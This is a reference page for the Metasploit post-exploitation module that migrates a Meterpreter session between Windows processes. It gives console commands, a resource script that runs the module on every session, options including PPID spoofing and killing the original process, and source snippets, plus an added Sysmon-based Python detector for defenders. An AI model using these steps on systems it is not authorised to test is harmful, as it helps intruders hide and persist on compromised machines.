Windows Manage Process Migration - Metasploit
This page contains detailed information about how to use the post/windows/manage/migrate Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Manage Process Migration
Module: post/windows/manage/migrate
Source code: modules/post/windows/manage/migrate.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module migrates a Meterpreter session from one process to another. It can migrate into a process given by its PID, or it can spawn a new process and migrate into that one.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/manage/migrate
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/manage/migrate
msf post(migrate) > show options
... show and set options ...
msf post(migrate) > set SESSION session-id
msf post(migrate) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
<ruby>
# Run the migrate module against every open session.
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/manage/migrate")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Msfconsole Usage
Here is how the windows/manage/migrate post exploitation module looks in the msfconsole:
msf6 > use post/windows/manage/migrate
msf6 post(windows/manage/migrate) > show info
Name: Windows Manage Process Migration
Module: post/windows/manage/migrate
Platform: Windows
Arch:
Rank: Normal
Provided by:
Carlos Perez <carlos_perez[at]darkoperator.com>
phra <https://iwantmore.pizza>
Compatible session types:
Meterpreter
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  KILL       false            no        Kill original process for the session.
  NAME                        no        Name of process to migrate to.
  PID        0                no        PID of process to migrate to.
  PPID       0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
  PPID_NAME                   no        Name of process for PPID spoofing when creating a new process.
  SESSION                     yes       The session to run this module on.
  SPAWN      true             no        Spawn process to migrate to. If set, notepad.exe is used.
Description:
This module will migrate a Meterpreter session from one process to
another. A given process PID to migrate to or the module can spawn
one and migrate to that newly spawned process.
Module Options
This is a complete list of options available in the windows/manage/migrate post exploitation module:
msf6 post(windows/manage/migrate) > show options
Module options (post/windows/manage/migrate):
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  KILL       false            no        Kill original process for the session.
  NAME                        no        Name of process to migrate to.
  PID        0                no        PID of process to migrate to.
  PPID       0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
  PPID_NAME                   no        Name of process for PPID spoofing when creating a new process.
  SESSION                     yes       The session to run this module on.
  SPAWN      true             no        Spawn process to migrate to. If set, notepad.exe is used.
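For defenders, the behaviour these options describe (a spawned notepad.exe that receives the session, an optional spoofed parent, and an optional kill of the original process) can be correlated in endpoint telemetry. The following Python example is added here and is not part of the module or of Metasploit; it flags a notepad.exe that receives a remote thread shortly after creation and records whether the injecting process differs from the recorded parent and whether it exits afterwards. Assumptions: the migration surfaces as a Sysmon CreateRemoteThread record (Event ID 8), events carry Sysmon field names, the 30-second window is a hypothetical tuning value, and the sample events are constructed.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=30)  # assumed correlation window, tune per environment

# Constructed sample events using Sysmon field names (not real telemetry).
EVENTS = [
    {"EventID": 1, "UtcTime": "2024-01-01 10:00:00", "ProcessId": 4120,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 812, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 8, "UtcTime": "2024-01-01 10:00:02", "SourceProcessId": 3344,
     "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetProcessId": 4120, "TargetImage": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 5, "UtcTime": "2024-01-01 10:00:03", "ProcessId": 3344,
     "Image": r"C:\Users\bob\AppData\Local\Temp\update.exe"},
    # Benign: a user opens notepad and nothing injects into it.
    {"EventID": 1, "UtcTime": "2024-01-01 10:05:00", "ProcessId": 5000,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 812, "ParentImage": r"C:\Windows\explorer.exe"},
]

def ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")

def detect_migration(events):
    """Correlate notepad.exe creation -> remote thread into it -> source exit."""
    spawned, alerts = {}, []
    for e in sorted(events, key=ts):
        if e["EventID"] == 1 and e["Image"].lower().endswith("\\notepad.exe"):
            spawned[e["ProcessId"]] = e
        elif e["EventID"] == 8 and e["TargetProcessId"] in spawned:
            birth = spawned[e["TargetProcessId"]]
            if ts(e) - ts(birth) > WINDOW:
                continue  # thread created long after start: outside this rule
            alerts.append({
                "target_pid": e["TargetProcessId"],
                "source_pid": e["SourceProcessId"],
                "source_image": e["SourceImage"],
                # Injector is not the recorded parent: consistent with PPID spoofing.
                "parent_mismatch": birth["ParentProcessId"] != e["SourceProcessId"],
                "source_exited": False, "at": ts(e)})
        elif e["EventID"] == 5:
            for a in alerts:
                if a["source_pid"] == e["ProcessId"] and ts(e) - a["at"] <= WINDOW:
                    a["source_exited"] = True  # matches what KILL=true would produce
    return alerts

if __name__ == "__main__":
    for alert in detect_migration(EVENTS):
        print(alert)
```

The rule keys on PID only, so in production it should key on Sysmon's ProcessGuid to avoid PID-reuse collisions.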
Advanced Options
Here is a complete list of advanced options supported by the windows/manage/migrate post exploitation module:
msf6 post(windows/manage/migrate) > show advanced
Module advanced options (post/windows/manage/migrate):
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  VERBOSE    false            no        Enable detailed status messages
  WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/manage/migrate module can do:
msf6 post(windows/manage/migrate) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/manage/migrate post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/manage/migrate) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the error messages listed below. For each one, the code snippet taken from the module source shows where the message is raised, which often helps in identifying the root cause of the problem.
Process <TARGET_PID> not found
Here is a relevant code snippet related to the "Process <TARGET_PID> not found" error message:
elsif datastore['NAME'] and datastore['NAME'] != ""
  target_pid = session.sys.process[datastore['NAME']]
end

if not target_pid or not has_pid?(target_pid)
  print_error("Process #{target_pid} not found")
  return
end

begin
  print_status("Migrating into #{target_pid}")
Could not migrate into process
Here is a relevant code snippet related to the "Could not migrate into process" error message:
begin
  print_status("Migrating into #{target_pid}")
  session.core.migrate(target_pid)
  print_good("Successfully migrated into process #{target_pid}")
rescue ::Exception => e
  print_error("Could not migrate into process")
  print_error("Exception: #{e.class} : #{e}")
end

if datastore['KILL']
  print_status("Killing original process with PID #{original_pid}")
Exception: <E.CLASS> : <E>
Here is a relevant code snippet related to the "Exception: <E.CLASS> : <E>" error message:
  print_status("Migrating into #{target_pid}")
  session.core.migrate(target_pid)
  print_good("Successfully migrated into process #{target_pid}")
rescue ::Exception => e
  print_error("Could not migrate into process")
  print_error("Exception: #{e.class} : #{e}")
end

if datastore['KILL']
  print_status("Killing original process with PID #{original_pid}")
  if has_pid?(original_pid)
PID <ORIGINAL_PID> exited on its own
Here is a relevant code snippet related to the "PID <ORIGINAL_PID> exited on its own" error message:
    print_status("Killing original process with PID #{original_pid}")
    if has_pid?(original_pid)
      session.sys.process.kill(original_pid)
      print_good("Successfully killed process with PID #{original_pid}")
    else
      print_warning("PID #{original_pid} exited on its own")
    end
  end
end

# Creates a temp notepad.exe to migrate to depending the architecture.
Process <TARGET_PPID> not found
Here is a relevant code snippet related to the "Process <TARGET_PPID> not found" error message:
cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

print_status("Spawning notepad.exe process to migrate into")

if target_ppid != 0 and not has_pid?(target_ppid)
  print_error("Process #{target_ppid} not found")
  return
elsif has_pid?(target_ppid)
  print_status("Spoofing PPID #{target_ppid}")
end
Related Pull Requests
- #13054 Merged Pull Request: Fix #13053 - post/windows/manage/migrate & PPID_NAME
- #12736 Merged Pull Request: Add support for PPID spoofing
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #8110 Merged Pull Request: fix migrate by process name
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2535 Merged Pull Request: Fix bug #8502, used %PATH% for notepad invocation
- #2525 Merged Pull Request: Change module boilerplate
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #2049 Merged Pull Request: [SeeRM:#8123] - Pid check
- #1242 Merged Pull Request: Msftidy fixes
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #1104 Merged Pull Request: Fixed bugs in filezilla and migrate modules, and added retry code to smart_hashdump.
- #958 Merged Pull Request: Msftidy 2
See Also
Check also the following modules related to this module:
- post/windows/manage/add_user
- post/windows/manage/archmigrate
- post/windows/manage/change_password
- post/windows/manage/clone_proxy_settings
- post/windows/manage/delete_user
- post/windows/manage/dell_memory_protect
- post/windows/manage/download_exec
- post/windows/manage/driver_loader
- post/windows/manage/enable_rdp
- post/windows/manage/enable_support_account
- post/windows/manage/exec_powershell
- post/windows/manage/execute_dotnet_assembly
- post/windows/manage/forward_pageant
- post/windows/manage/hashcarve
- post/windows/manage/ie_proxypac
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/install_python
- post/windows/manage/install_ssh
- post/windows/manage/killav
- post/windows/manage/mssql_local_auth_bypass
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
- post/windows/manage/peinjector
- post/windows/manage/persistence_exe
- post/windows/manage/portproxy
- post/windows/manage/pptp_tunnel
- post/windows/manage/priv_migrate
- post/windows/manage/pxeexploit
- post/windows/manage/reflective_dll_inject
- post/windows/manage/remove_ca
- post/windows/manage/remove_host
- post/windows/manage/rid_hijack
- post/windows/manage/rollback_defender_signatures
- post/windows/manage/rpcapd_start
- post/windows/manage/run_as
- post/windows/manage/run_as_psh
- post/windows/manage/sdel
- post/windows/manage/shellcode_inject
- post/windows/manage/sshkey_persistence
- post/windows/manage/sticky_keys
- post/windows/manage/vmdk_mount
- post/windows/manage/vss
- post/windows/manage/vss_create
- post/windows/manage/vss_list
- post/windows/manage/vss_mount
- post/windows/manage/vss_set_storage
- post/windows/manage/vss_storage
- post/windows/manage/wdigest_caching
- post/windows/manage/webcam
Authors
- Carlos Perez <carlos_perez[at]darkoperator.com>
- phra <https://iwantmore.pizza>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.